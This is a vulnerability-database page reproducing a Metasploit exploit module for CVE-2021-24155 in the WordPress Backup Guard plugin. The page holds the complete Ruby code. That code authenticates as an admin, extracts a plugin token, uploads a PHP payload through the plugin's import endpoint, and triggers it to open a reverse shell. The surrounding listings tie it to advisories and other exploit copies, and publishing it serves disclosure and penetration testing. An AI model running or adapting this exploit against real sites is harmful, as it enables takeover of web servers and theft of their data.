Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Backup Guard Authenticated Remote Code Execution Exploit

🗓️ 21 Jul 2021 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 155 Views

Wordpress Backup Guard - Authenticated Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Wordpress Backup Guard 1.5.8 Plugin - Remote Code Execution (Authenticated) Exploit
5 Jul 202100:00
zdt
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Backup-Guard Backup_Guard
30 Jul 202111:28
githubexploit
Circl		CVE-2021-24155
10 Jul 202116:29
circl
CNNVD		WordPress 代码问题漏洞
5 Apr 202100:00
cnnvd
Check Point Advisories		p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)
19 Oct 202100:00
checkpoint_advisories
CVE		CVE-2021-24155
5 Apr 202118:27
cve
Cvelist		CVE-2021-24155 Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload
5 Apr 202118:27
cvelist
Exploit DB		Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)
5 Jul 202100:00
exploitdb
Metasploit		Wordpress Plugin Backup Guard - Authenticated Remote Code Execution
21 Jul 202117:42
metasploit
Nuclei		WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload
8 Jun 202604:09
nuclei
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin Backup Guard - Authenticated Remote Code Execution',
        'Description' => %q{
          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
          due to an arbitrary file upload vulnerability in Wordpress plugin Backup Guard < 1.6.0.
          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
          Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/<random_payload_name>.php`
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Nguyen Van Khanh', # Original PoC, discovery
            'Ron Jost', # Exploit-db
            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
          ],
        'References' =>
          [
            ['EDB', '50093'],
            ['CVE', '2021-24155'],
            ['CWE', '434'],
            ['WPVDB', 'd442acac-4394-45e4-b6bb-adf4a40960fb'],
            ['URL', 'https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2473510%40backup&old=2472212%40backup&sfp_email=&sfph_mail=']
          ],
        'Platform' => [ 'php' ],
        'Arch' => ARCH_PHP,
        'Targets' =>
        [
          [ 'Wordpress Backup Guard < 1.6.0', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2021-05-04',
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
    ]
  end

  def check
    return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?

    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    return CheckCode::Detected('Authentication to Wordpress failed.') unless cookie

    check_plugin_version_from_readme('backup', '1.6.0')
  end

  def get_token(cookie)
    r = send_request_cgi({
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'Referer' => full_uri('/wp-admin/users.php'),
      'vars_get' => {
        'page' => 'backup_guard_backups'
      }
    })
    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
    res = r.body.to_s.match(/&token=(\h+)/)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the token.') unless res
    res[1]
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
    token = get_token(cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the Backup Guard token') unless token
    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, 'text/php', nil, "form-data; name='files[]'; filename=#{payload_name}")

    print_status("Uploading file \'#{payload_name}\' containing the payload...")

    r = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/wp-admin/admin-ajax.php'),
      'headers' => {
        'Origin' => full_uri(''),
        'Referer' => full_uri('/wp-admin/admin.php?page=backup_guard_backups'),
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'vars_get' =>
      {
        'action' => 'backup_guard_importBackup',
        'token' => token
      },
      'cookie' => cookie,
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    )

    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200
    register_files_for_cleanup(payload_name.to_s)

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/backup-guard/#{payload_name}")
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2021 00:00Current
0.6Low risk
Vulners AI Score0.6
CVSS 26.5
CVSS 3.17.2
EPSS0.92823
metasploitremotehttpclientwordpressfiledropperexploit-dbcvecwewpvdbphparch_phpbackup guardpluginarbitrary file uploadsgbpreverse shellprivileged accountarbitrary file extensionpayloadauthenticationtokenvulnerabilityupload fileexploitbackup guard token
155